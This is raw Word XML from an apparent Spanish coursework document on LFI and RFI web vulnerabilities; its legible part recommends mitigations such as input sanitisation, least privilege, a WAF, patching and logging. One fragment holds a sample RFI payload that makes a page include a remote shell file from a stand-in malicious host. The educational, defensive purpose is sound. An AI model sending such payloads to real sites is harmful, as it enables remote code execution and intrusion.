    <w:p w14:paraId="75E5AA94" w14:textId="6222C663" w:rsidR="001872EF" w:rsidRDefault="001872EF" w:rsidP="00276D9E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as vulnerabilidades de LFI y RFI representan serios riesgos para la seguridad de las aplicaciones web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siendo crucial impl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mentar prácticas de codificación segura,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</w:t>
      </w:r>
      <w:r w:rsid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ción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y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anitiza</w:t>
      </w:r>
      <w:r w:rsid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ción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todas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s entradas del usuario y configurar adecuadamente el servidor para mitigar estos riesgos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AABA30" w14:textId="008B7519" w:rsidR="00276D9E" w:rsidRDefault="00276D9E" w:rsidP="00276D9E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demás de todo lo analizado, es interesante implementar</w:t>
      </w:r>
      <w:r w:rsid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9B4A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edidas me</w:t>
      </w:r>
      <w:r w:rsid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inimicen </w:t>
      </w:r>
      <w:r w:rsidR="004B2A1D"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ignificativamente el riesgo de ataques RFI y mejorar la seguridad general de la aplicación web</w:t>
      </w:r>
      <w:r w:rsid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61394A1" w14:textId="643ADB4D" w:rsidR="00276D9E" w:rsidRDefault="00276D9E" w:rsidP="00276D9E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 el manejo de errore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ntro del script PHP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indicar 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que no muestren mensajes de error que puedan revelar información del sistema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4FB4517A" w14:textId="77777777" w:rsidR="00276D9E" w:rsidRDefault="00276D9E" w:rsidP="00276D9E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tablecer una política de seguridad con el principio del mínimo privilegio, es decir la información será accesible a los usuarios autenticados, en la medida que le permita realizar su trabajo, no pudiendo acceder a contenido que no sea necesario para el mismo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3AD706A6" w14:textId="77777777" w:rsidR="00276D9E" w:rsidRDefault="00276D9E" w:rsidP="00276D9E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igurar el servidor web (por ejemplo, Apache) para limitar el acceso a directorios sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF6EFB" w14:textId="77777777" w:rsidR="004B2A1D" w:rsidRDefault="00276D9E" w:rsidP="004B2A1D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so de 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irewall de aplicaciones web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WAF)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para </w:t>
      </w:r>
      <w:r w:rsidRP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yudar a detectar y bloquear intentos de RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498FBAB" w14:textId="77777777" w:rsidR="004B2A1D" w:rsidRDefault="004B2A1D" w:rsidP="004B2A1D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</w:t>
      </w:r>
      <w:r w:rsidR="00276D9E"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ntener actualizado el sistema operativo, el servidor web y PHP para protegerse contra vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27058595" w14:textId="77777777" w:rsidR="004B2A1D" w:rsidRDefault="00276D9E" w:rsidP="004B2A1D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un sistema de monitor</w:t>
      </w:r>
      <w:r w:rsidR="004B2A1D"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zación</w:t>
      </w:r>
      <w:r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ara detectar actividades sospechosas</w:t>
      </w:r>
      <w:r w:rsidR="004B2A1D"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el cual mantenga logs detallados de las solicitudes al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FF0CB" w14:textId="198A03B8" w:rsidR="00276D9E" w:rsidRPr="004B2A1D" w:rsidRDefault="00276D9E" w:rsidP="004B2A1D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista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ormar a los desarrolladores en prácticas de codificación segura y concienciarlos sobre los riesgos de RFI</w:t>
      </w:r>
      <w:r w:rsidR="004B2A1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sectPr w:rsidR="00276D9E" w:rsidRPr="004B2A1D" w:rsidSect="00DD66F3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208D" w14:textId="77777777" w:rsidR="00BA5988" w:rsidRDefault="00BA5988" w:rsidP="005A6BA4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62446323" w14:textId="77777777" w:rsidR="00BA5988" w:rsidRDefault="00BA5988" w:rsidP="005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329956"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="0635B323" w14:textId="27C54465" w:rsidR="00DD66F3" w:rsidRDefault="00DD6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6DA1" w14:textId="17A0930A" w:rsidR="005A6BA4" w:rsidRPr="005A6BA4" w:rsidRDefault="005A6BA4" w:rsidP="005A6BA4">
    <w:pPr>
      <w:pStyle w:val="Piedepgina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4DB2" w14:textId="77777777" w:rsidR="00BA5988" w:rsidRDefault="00BA5988" w:rsidP="005A6BA4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4678C5BF" w14:textId="77777777" w:rsidR="00BA5988" w:rsidRDefault="00BA5988" w:rsidP="005A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8B9E" w14:textId="060AC778" w:rsidR="005A6BA4" w:rsidRPr="00BC3748" w:rsidRDefault="00DD66F3" w:rsidP="00DD66F3">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00BC3748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BC3748">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">                                            </w:t>
    </w:r>
    <w:r w:rsidRPr="00BC3748">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">      U1_S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4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5EE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D4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="834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7D02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FD0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70DAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DC4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34A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A8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643AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7478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16228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C0589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13822"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79CA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C5247"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A1269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56038"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F4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207A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A874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212A6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D2247"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6388B3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F3A86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDB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36E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87A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07CB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF76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A5DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6C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6732F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="619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D4EBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC2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152A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D82A6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D5A2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79B0D0D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B144F9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="029C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F34D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="065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16AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5340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26C32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA1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6D1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1E8C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C24BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BADC0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B4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="928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427C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22B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90B84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9F8A4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80E05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0ED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4C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B58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17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="327056051">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1794707369">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="449322832">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="639191184">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1991904441">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1081179089">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1918436674">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="428818235">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="851456480">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1108550678">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="39745796">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="203375773">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="961349203">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1715230949">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="128741794">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1990668405">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1343897807">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2120685136">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1119764290">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1701542537">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1531451079">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1216625284">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1349211571">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1766684797">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="340204982">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2105491564">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1732074816">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="595290592">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="144048564">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1820270337">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1087462240">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1006907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5"/>
    <w:rsid w:val="000041C8"/>
    <w:rsid w:val="00012521"/>
    <w:rsid w:val="00064B1D"/>
    <w:rsid w:val="000B7FCA"/>
    <w:rsid w:val="00130368"/>
    <w:rsid w:val="0015488D"/>
    <w:rsid w:val="0016165F"/>
    <w:rsid w:val="001872EF"/>
    <w:rsid w:val="001A1D47"/>
    <w:rsid w:val="0023669D"/>
    <w:rsid w:val="00276D9E"/>
    <w:rsid w:val="002B75D0"/>
    <w:rsid w:val="002D5149"/>
    <w:rsid w:val="002F77CB"/>
    <w:rsid w:val="003225CE"/>
    <w:rsid w:val="00376305"/>
    <w:rsid w:val="003B0E1B"/>
    <w:rsid w:val="003B5B52"/>
    <w:rsid w:val="003E6A8A"/>
    <w:rsid w:val="003F706A"/>
    <w:rsid w:val="004007F0"/>
    <w:rsid w:val="0040509C"/>
    <w:rsid w:val="00415A52"/>
    <w:rsid w:val="00423A7E"/>
    <w:rsid w:val="004370AF"/>
    <w:rsid w:val="00457DBA"/>
    <w:rsid w:val="00467A0F"/>
    <w:rsid w:val="004A32A6"/>
    <w:rsid w:val="004B2A1D"/>
    <w:rsid w:val="004C4D86"/>
    <w:rsid w:val="00505170"/>
    <w:rsid w:val="005268F9"/>
    <w:rsid w:val="00526D35"/>
    <w:rsid w:val="00581D32"/>
    <w:rsid w:val="005A6BA4"/>
    <w:rsid w:val="005B069E"/>
    <w:rsid w:val="005B6A2D"/>
    <w:rsid w:val="005C2BE0"/>
    <w:rsid w:val="005D58F3"/>
    <w:rsid w:val="005F6B60"/>
    <w:rsid w:val="00651C2A"/>
    <w:rsid w:val="00661039"/>
    <w:rsid w:val="00681346"/>
    <w:rsid w:val="006866E5"/>
    <w:rsid w:val="006922AB"/>
    <w:rsid w:val="006B3B2B"/>
    <w:rsid w:val="006F4E56"/>
    <w:rsid w:val="00726825"/>
    <w:rsid w:val="0075506C"/>
    <w:rsid w:val="0076054D"/>
    <w:rsid w:val="007702D5"/>
    <w:rsid w:val="00775908"/>
    <w:rsid w:val="00817437"/>
    <w:rsid w:val="00846D6A"/>
    <w:rsid w:val="008853CE"/>
    <w:rsid w:val="008C0D19"/>
    <w:rsid w:val="008D59A3"/>
    <w:rsid w:val="008E69CD"/>
    <w:rsid w:val="008F3BDA"/>
    <w:rsid w:val="00951759"/>
    <w:rsid w:val="009B26AE"/>
    <w:rsid w:val="009B4A8B"/>
    <w:rsid w:val="009D6B8B"/>
    <w:rsid w:val="009E23B9"/>
    <w:rsid w:val="009E370B"/>
    <w:rsid w:val="009E47DE"/>
    <w:rsid w:val="00A35EF1"/>
    <w:rsid w:val="00A707A9"/>
    <w:rsid w:val="00AB3548"/>
    <w:rsid w:val="00AB5CCF"/>
    <w:rsid w:val="00AC7B6C"/>
    <w:rsid w:val="00AF1617"/>
    <w:rsid w:val="00AF4585"/>
    <w:rsid w:val="00BA5988"/>
    <w:rsid w:val="00BB16A7"/>
    <w:rsid w:val="00BC3748"/>
    <w:rsid w:val="00BF130D"/>
    <w:rsid w:val="00BF4F85"/>
    <w:rsid w:val="00C21FD5"/>
    <w:rsid w:val="00C41713"/>
    <w:rsid w:val="00C73125"/>
    <w:rsid w:val="00D77602"/>
    <w:rsid w:val="00DD619C"/>
    <w:rsid w:val="00DD66F3"/>
    <w:rsid w:val="00E139E3"/>
    <w:rsid w:val="00E43B22"/>
    <w:rsid w:val="00E4562D"/>
    <w:rsid w:val="00E561F8"/>
    <w:rsid w:val="00E62B2A"/>
    <w:rsid w:val="00E8359B"/>
    <w:rsid w:val="00E86623"/>
    <w:rsid w:val="00ED25DB"/>
    <w:rsid w:val="00F15E4D"/>
    <w:rsid w:val="00FF2F0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8FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3C69D891-8646-40D8-B27A-E2853FD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87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187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1872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8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D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D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BA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Piedepgina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BA4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textonotapie">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextonotapieCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AF45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5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58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872EF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872EF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1872EF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72E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872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872EF"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008853CE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="simtextwritetextbodyhfvfn">
    <w:name w:val="simtextwrite_textbody__hfvfn"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00C21FD5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="004370AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="004370AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-s">
    <w:name w:val="vlist-s"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="0043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1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5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8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8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6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example.com/index.php?page=http://malicious.com/shell.tx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0A5-51CB-4CDA-A2EE-3402485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37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-04T02:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-16T10:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>